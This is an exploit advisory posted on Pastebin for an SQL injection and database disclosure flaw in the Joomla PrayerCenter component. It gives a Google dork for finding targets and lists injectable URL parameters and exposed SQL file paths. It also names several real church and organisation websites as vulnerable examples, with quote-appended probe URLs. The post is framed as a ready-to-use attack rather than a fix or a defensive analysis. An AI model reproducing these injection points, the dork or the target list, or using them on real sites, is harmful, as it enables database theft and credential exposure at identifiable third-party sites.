KingSkrupellos

Joomla PrayerCenter 3.0.4 SQL Inj DB Disc

Feb 13th, 2019
60
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.17 KB | None | 0 0
  1. ####################################################################
  2.  
  3. # Exploit Title : Joomla PrayerCenter 3.0.4 SQL Injection / Database Disclosure
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 14/02/2019
  7. # Vendor Homepage : mlwebtechnologies.com/
  8. # Software Download Link : github.com/MLWebTechnologies/PrayerCenter/releases
  9. github.com/MLWebTechnologies/PrayerCenter/archive/3.0.4.zip
  10. github.com/MLWebTechnologies/PrayerCenter/archive/3.0.3.zip
  11. github.com/MLWebTechnologies/PrayerCenter/archive/3.0.2.zip
  12. github.com/MLWebTechnologies/PrayerCenter/archive/3.0.1.zip
  13. github.com/MLWebTechnologies/PrayerCenter/archive/2.5.2.zip
  14. # Software Information Link : extensions.joomla.org/extensions/extension/living/religion/prayercenter/
  15. github.com/MLWebTechnologies/PrayerCenter/releases
  16. # Software Affected Versions : 2.5.2 - 3.0.1 - 3.0.2 - 3.0.3 - 3.0.4
  17. # Tested On : Windows and Linux
  18. # Category : WebApps
  19. # Exploit Risk : Medium
  20. # Google Dorks : inurl:''/index.php?option=com_prayercenter''
  21. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  22. Special Elements used in an SQL Command ('SQL Injection') ]
  23. CWE-200 [ Information Exposure ]
  24. # Old Similar CVE : CVE-2018-7314
  25. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  26. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  27. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  28.  
  29. ####################################################################
  30.  
  31. # Description about Software :
  32. ***************************
  33. PrayerCenter 3.0.4 and 3.0.2 is now available for Joomla 3.x.
  34.  
  35. The PrayerCenter Component provides users of a website with the capability to
  36.  
  37. share their prayer concerns with others. Prayer concerns can be posted to the website, sent to
  38.  
  39. members of the prayer chain, and sent to the Spiritual director or pastor.
  40.  
  41. Users can subscribe to be members of the prayer chain via online form.
  42.  
  43. ####################################################################
  44.  
  45. # Impact :
  46. ***********
  47. * Joomla PrayerCenter 3.0.4 and other versions -
  48.  
  49. component for Joomla is prone to an SQL-injection vulnerability because it
  50.  
  51. fails to sufficiently sanitize user-supplied data before using it in an SQL query.
  52.  
  53. Exploiting this issue could allow an attacker to compromise the application,
  54.  
  55. access or modify data, or exploit latent vulnerabilities in the underlying database.
  56.  
  57. A remote attacker can send a specially crafted request to the vulnerable application
  58.  
  59. and execute arbitrary SQL commands in application`s database.
  60.  
  61. Further exploitation of this vulnerability may result in unauthorized data manipulation.
  62.  
  63. An attacker can exploit this issue using a browser.
  64.  
  65. * This Software prone to an information exposure/database disclosure vulnerability.
  66.  
  67. Successful exploits of this issue may allow an attacker to obtain sensitive
  68.  
  69. information by downloading the full contents of the application's database.
  70.  
  71. * Any remote user may download the database files and gain access
  72.  
  73. to sensitive information including unencrypted authentication credentials.
  74.  
  75. ####################################################################
  76.  
  77. # SQL Injection Exploit :
  78. **********************
  79. /index.php?option=com_prayercenter&Itemid=[SQL Injection]
  80.  
  81. /index.php?Itemid=[SQL Injection]&option=com_prayercenter
  82.  
  83. /index.php?option=com_prayercenter&task=view&Itemid=[SQL Injection]
  84.  
  85. /index.php?option=com_prayercenter&task=view_devotion&Itemid=[SQL Injection]
  86.  
  87. /index.php?option=com_prayercenter&task=view&Itemid=[ID-NUMBER]&limitstart=[SQL Injection]
  88.  
  89. /index.php?option=com_prayercenter&task=confirm&id=[ID-NUMBER]&sessionid=[SQL Injection]
  90.  
  91. # Database Disclosure Exploit :
  92. *******************************
  93. /admin/sql/install.mysql.utf8.sql
  94.  
  95. /admin/sql/uninstall.mysql.utf8.sql
  96.  
  97. /administrator/components/com_prayercenter/install.mysql.utf8.sql
  98.  
  99. /administrator/components/com_prayercenter/uninstall.mysql.utf8.sql
  100.  
  101. ####################################################################
  102.  
  103. # Example Vulnerable Sites :
  104. *************************
  105. [+] fntchurch.org/index.php?Itemid=64&option=com_prayercenter
  106.  
  107. [+] maranathapdx.org/index.php?option=com_prayercenter&task=view&Itemid=79%27
  108.  
  109. [+] vieni-con-noi.de/index.php?option=com_prayercenter&task=view&Itemid=1%27
  110.  
  111. [+] maranathapdx.org/joomla/index.php?option=com_prayercenter&task=view&Itemid=79&limitstart=8%27
  112.  
  113. [+] justasyouare.org/jaya/index.php?option=com_prayercenter&task=view_devotion&Itemid=1%27
  114.  
  115. [+] mail.exagora.net/index.php?option=com_prayercenter&Itemid=27%27
  116.  
  117. [+] enfraternidad.com/main/index.php?option=com_prayercenter&task=view&Itemid=84&limitstart=30%27
  118.  
  119. ####################################################################
  120.  
  121. # Example SQL Database Error :
  122. ****************************
  123. jos-Warning: Error loading component: com_prayercenter
  124.  
  125. Deprecated: Function eregi() is deprecated in /home/enfrater
  126. /public_html/main/components/com_prayercenter
  127. /helpers/pc_includes.php on line 793
  128.  
  129. ####################################################################
  130.  
  131. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  132.  
  133. ####################################################################
Add Comment
Please, Sign In to add comment